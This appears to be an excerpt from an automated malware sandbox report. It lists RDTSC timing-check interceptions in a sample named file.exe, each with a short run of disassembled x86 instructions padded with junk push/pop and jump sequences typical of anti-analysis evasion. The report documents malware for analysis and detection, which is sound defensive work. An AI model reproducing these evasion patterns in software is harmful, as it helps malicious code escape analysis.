                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AE48F second address: 8AE494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AE494 second address: 8AE4A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FF17CC823A6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AE4A0 second address: 8AE4B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FF17CBED4E6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AE4B0 second address: 8AE4EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a jmp 00007FF17CC823B7h 0x0000000f jmp 00007FF17CC823B3h 0x00000014 pop eax 0x00000015 js 00007FF17CC823AEh 0x0000001b push edx 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AEA6C second address: 8AEA80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jns 00007FF17CBED4E6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AEA80 second address: 8AEA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AEA85 second address: 8AEA98 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF17CBED4EEh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AEC28 second address: 8AEC32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AEC32 second address: 8AEC3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF17CBED4E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AEDE2 second address: 8AEDF2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF17CC823B2h 0x00000008 js 00007FF17CC823A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AEDF2 second address: 8AEE00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jg 00007FF17CBED4E6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF0F4 second address: 8AF119 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF17CC823B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007FF17CC823ADh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF251 second address: 8AF256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF256 second address: 8AF25C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF25C second address: 8AF276 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007FF17CBED4ECh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B290B second address: 8B2921 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FF17CC823ABh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B2921 second address: 8B2928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B2928 second address: 8B292E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B292E second address: 8B2946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF17CBED4F4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B2946 second address: 8B294A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83A360 second address: 83A38C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FF17CBED4EAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FF17CBED4F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83A38C second address: 83A390 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7FA8 second address: 8B7FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF17CBED4F3h 0x00000009 jmp 00007FF17CBED4ECh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7FCB second address: 8B7FFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CC823ABh 0x00000007 jmp 00007FF17CC823ACh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jmp 00007FF17CC823AAh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 836DD7 second address: 836DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6A79 second address: 8B6A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF17CC823B9h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6A99 second address: 8B6ABC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF17CBED4F2h 0x00000008 je 00007FF17CBED4E8h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6ABC second address: 8B6AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6AC2 second address: 8B6AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6AC6 second address: 8B6ADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CC823B3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6C25 second address: 8B6C29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6C29 second address: 8B6C45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF17CC823B4h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6C45 second address: 8B6C6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FF17CBED4EFh 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007FF17CBED4ECh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6C6B second address: 8B6C70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6C70 second address: 8B6C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FF17CBED4E6h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7030 second address: 8B7038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7191 second address: 8B7197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B743D second address: 8B745F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FF17CC823A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007FF17CC823A8h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 pop eax 0x00000019 pushad 0x0000001a popad 0x0000001b push edi 0x0000001c pop edi 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B745F second address: 8B7465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B75B6 second address: 8B75CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007FF17CC823AEh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B75CE second address: 8B75D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B75D2 second address: 8B75DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B75DB second address: 8B75E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B787D second address: 8B7881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7881 second address: 8B78AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FF17CBED501h 0x0000000f jmp 00007FF17CBED4F9h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7A53 second address: 8B7A6D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF17CC823AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FF17CC823A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7A6D second address: 8B7A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8690C5 second address: 8690CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B67AC second address: 8B67B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE63A second address: 8BE63E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE63E second address: 8BE65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF17CBED4F2h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE65D second address: 8BE699 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF17CC823A6h 0x00000008 jl 00007FF17CC823A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 jmp 00007FF17CC823B2h 0x00000016 jmp 00007FF17CC823B8h 0x0000001b pop ecx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD34C second address: 8BD398 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF17CBED4EEh 0x00000008 jmp 00007FF17CBED4ECh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push edx 0x00000011 jmp 00007FF17CBED4F8h 0x00000016 jns 00007FF17CBED4E6h 0x0000001c pop edx 0x0000001d push ebx 0x0000001e jmp 00007FF17CBED4EAh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD4F3 second address: 8BD516 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CC823B6h 0x00000007 jo 00007FF17CC823A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD516 second address: 8BD538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FF17CBED4FAh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD538 second address: 8BD555 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF17CC823B8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD555 second address: 8BD55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD84B second address: 8BD85D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FF17CC823A6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD9B9 second address: 8BD9C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007FF17CBED4F2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD9C7 second address: 8BD9CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD9CD second address: 8BD9E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FF17CBED4F2h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD9E5 second address: 8BD9FE instructions: 0x00000000 rdtsc 0x00000002 je 00007FF17CC823A6h 0x00000008 jnl 00007FF17CC823A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 push edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 popad 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD9FE second address: 8BDA04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BDA04 second address: 8BDA0A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BDD61 second address: 8BDD6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE2D0 second address: 8BE2E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CC823ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE2E8 second address: 8BE2ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFD08 second address: 8BFD0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFD0F second address: 8BFD14 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFD14 second address: 8BFD37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF17CC823A6h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jmp 00007FF17CC823AFh 0x00000011 jno 00007FF17CC823A6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84294E second address: 842952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 842952 second address: 842965 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF17CC823A6h 0x00000008 jl 00007FF17CC823A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C301A second address: 8C3032 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF17CBED4EAh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF17CBED4EAh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C3032 second address: 8C3036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88823E second address: 868534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF17CBED4F3h 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c jmp 00007FF17CBED4EAh 0x00000011 nop 0x00000012 mov dword ptr [ebp+122D26CFh], edi 0x00000018 lea eax, dword ptr [ebp+12487FF3h] 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007FF17CBED4E8h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 0000001Bh 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 mov dx, 3ED6h 0x0000003c jmp 00007FF17CBED4EBh 0x00000041 push eax 0x00000042 jmp 00007FF17CBED4F4h 0x00000047 mov dword ptr [esp], eax 0x0000004a add dword ptr [ebp+122D28EEh], edi 0x00000050 call dword ptr [ebp+122D2A46h] 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 jng 00007FF17CBED4E6h 0x0000005f jg 00007FF17CBED4E6h 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88836C second address: 888370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888370 second address: 888376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888376 second address: 88837D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88844C second address: 888450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888815 second address: 88881A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88881A second address: 888820 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888820 second address: 888824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888897 second address: 88889B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888A5D second address: 888A61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888A61 second address: 888A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888A67 second address: 888A6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888A6E second address: 888A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c pushad 0x0000000d je 00007FF17CBED4E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888CC5 second address: 888CC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888CC9 second address: 888CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888CCF second address: 888CD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FF17CC823A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888CD9 second address: 888CDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888CDD second address: 888CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888CEC second address: 888CF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888CF2 second address: 888CF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888CF8 second address: 888CFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
